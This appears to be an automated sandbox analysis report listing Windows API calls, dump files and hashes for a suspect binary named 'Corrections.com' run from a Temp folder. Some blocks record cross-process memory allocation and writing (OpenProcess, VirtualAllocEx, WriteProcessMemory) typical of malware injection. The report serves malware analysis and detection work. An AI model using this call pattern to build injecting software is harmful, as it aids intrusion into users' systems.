                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF0CD75215302ABDB212FA8ED4DF963BADEF893B0F100420FA05D72A0EB31DC019B60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00981976
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00981982
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00981991
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00981998
                                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009819AE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3e907035ed176f99b1c0294fa5eca02161ab550745a8be9f2f5cb344940bd4b6
                                                                                                                                                                                                                                                                                            • Instruction ID: 1de0e25551d233854b1c0ea5adab039aa0b412fb69aa40e6b9318e1c0c3e905a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e907035ed176f99b1c0294fa5eca02161ab550745a8be9f2f5cb344940bd4b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71F0CD75215312ABDB212FA8ED58F563BADEF893B0F100520FA05C72A0EA31E8419B60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CCB
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CD8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CE5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CF2
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CFF
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990D0C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0f6e78e021462244d70c11e9a6488952d79b14903c270b0a8845b090d503dd18
                                                                                                                                                                                                                                                                                            • Instruction ID: b4dbef089ca9f0b301d841aa022119f67adba619e51775a52cb756f5284376cc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f6e78e021462244d70c11e9a6488952d79b14903c270b0a8845b090d503dd18
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A401A271801B15DFCB30AF6AD980816FBF9BF903153158A3ED1A752931C7B0A994DF80
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 009865BF
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 009865D6
                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 009865EE
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 0098660A
                                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00986624
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d7193bbe7b0d97c53567f5ed326bbcbb68e883a190536407603d18bfefb68f74
                                                                                                                                                                                                                                                                                            • Instruction ID: 241321d4cbfbdd908d87f8534c6cc43276542754d9d822cf6b0563f41e6dc5fd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7193bbe7b0d97c53567f5ed326bbcbb68e883a190536407603d18bfefb68f74
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0018130515304ABEB206F20DE4EF9A7BB8FB00715F000669B586A61E1FBF4AA44DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DAD2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DAE4
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DAF6
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DB08
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095DB1A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 97c483fdc292060cc445df4986545ef8443b40599571e10091e78552c924577a
                                                                                                                                                                                                                                                                                            • Instruction ID: 495446867e69d41622351c99396abe4f2e9fd038d0026318e6653bce1a2d7ff5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97c483fdc292060cc445df4986545ef8443b40599571e10091e78552c924577a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0F0303255B248AB8634EB6AF9C2D1B77EEFE557127A50C05F809DB541CB30FC848B64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095262E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00952640
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00952653
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00952664
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00952675
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bf495b4ffba9d91dda93087a2068bbbf9c0b69d1f8f30c379b3afb2549da8be3
                                                                                                                                                                                                                                                                                            • Instruction ID: e4bd82edf99a80a6a55912b0371e372608edc6d22573efbd14fda518eb4f534c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf495b4ffba9d91dda93087a2068bbbf9c0b69d1f8f30c379b3afb2549da8be3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F0DA7492B6219BCA16EF59EC41AA83BA4FB7A752315090BF8249A2B5C7310905FFC4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __freea$_free
                                                                                                                                                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c65accca0166e7c5dc59d90e88df3f4631057b5f260325c2b505f349bfe1f2f
                                                                                                                                                                                                                                                                                            • Instruction ID: acfc23fb102f0983b7c996833b827add65a1f7828c27d4d4035c834e6824577f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c65accca0166e7c5dc59d90e88df3f4631057b5f260325c2b505f349bfe1f2f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13D14A75900206DBCB24DF6AC855BFAB7B9FF45302F28455AED029B260D3399D89CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00982B1D,?,?,00000034,00000800,?,00000034), ref: 0098BDF4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009830AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00982B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0098BDBF
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0098BD1C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00982AE1,00000034,?,?,00001004,00000000,00000000), ref: 0098BD2C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00982AE1,00000034,?,?,00001004,00000000,00000000), ref: 0098BD42
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0098311A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00983167
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 63bcfa8740360c7782ccbd6fd53cc113bc96cc05b8bff0c84a6fff431fc9a30b
                                                                                                                                                                                                                                                                                            • Instruction ID: 8054a054c70d480b4f5d378b167f34b418df8144e9a27a5dcae0bc41e52ab35b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63bcfa8740360c7782ccbd6fd53cc113bc96cc05b8bff0c84a6fff431fc9a30b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D412CB2900218BEDB10EBA4CD85BDEBBB8EF45700F048095FA45B7280DB706F85CB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\628056\Corrections.com,00000104), ref: 00951AD9
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00951BA4
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00951BAE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                            • API String ID: 2506810119-1710334032
                                                                                                                                                                                                                                                                                            • Opcode ID: 7e770ea1e375cdb597f7751b654021ee124245c579c942206dbd7ea2f6f26b22
                                                                                                                                                                                                                                                                                            • Instruction ID: 4dd00b7c5a4ca00c1668f648e5c94e55aa92febd46131188d20faa7677664861
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e770ea1e375cdb597f7751b654021ee124245c579c942206dbd7ea2f6f26b22
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65319071A04218AFCB25DF9ADC81FAEBBFCEF85711B1041A6FC1497215E6708E48DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0098CBB1
                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0098CBF7
                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009F29C0,018462D8), ref: 0098CC40
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: b04c27bb2e3dc5b0c87ecec5016215d2644e49800423695adf6731fc881b9d70
                                                                                                                                                                                                                                                                                            • Instruction ID: 89e76dc839c8e08d8a2026619cd3684015b3c695ae2a29e648526eea05079db7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b04c27bb2e3dc5b0c87ecec5016215d2644e49800423695adf6731fc881b9d70
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2241BFB12043029FD720EF24DD85F5ABBE8AF85724F144A1DF5A997391DB70E904CB62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009BDCD0,00000000,?,?,?,?), ref: 009B4F48
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32 ref: 009B4F65
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B4F75
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                            • Opcode ID: e439c9c08d31faff89b3a00c1256915f9846fa4d21d2a533bbc2330982e037a9
                                                                                                                                                                                                                                                                                            • Instruction ID: ec33b07585673e42e4529592e12d6adbe3dc9795a6d292bf60a97f6d8a3b1f84
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e439c9c08d31faff89b3a00c1256915f9846fa4d21d2a533bbc2330982e037a9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF31BE71214205AFDB218F78DC45BEA7BA9EB48334F204724F979A31E1D770EC60AB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009A3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,009A3AD4,?,?), ref: 009A3DD5
                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009A3AD7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009A3AF8
                                                                                                                                                                                                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 009A3B63
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                            • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                            • Opcode ID: eb6f736de084a4a276b1e8e4110ca9e4a787c6b44507f1ac659321c83f2f2d51
                                                                                                                                                                                                                                                                                            • Instruction ID: c3a964073951e2c7a3e68e5ae5995fd04249407940b90996762f0cdee0a58358
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb6f736de084a4a276b1e8e4110ca9e4a787c6b44507f1ac659321c83f2f2d51
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8131AF792002019FCB10CF69C585AB977A6EF56324F24C159F8168B3A2D731EE41CBB0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009B49DC
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009B49F0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 009B4A14
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
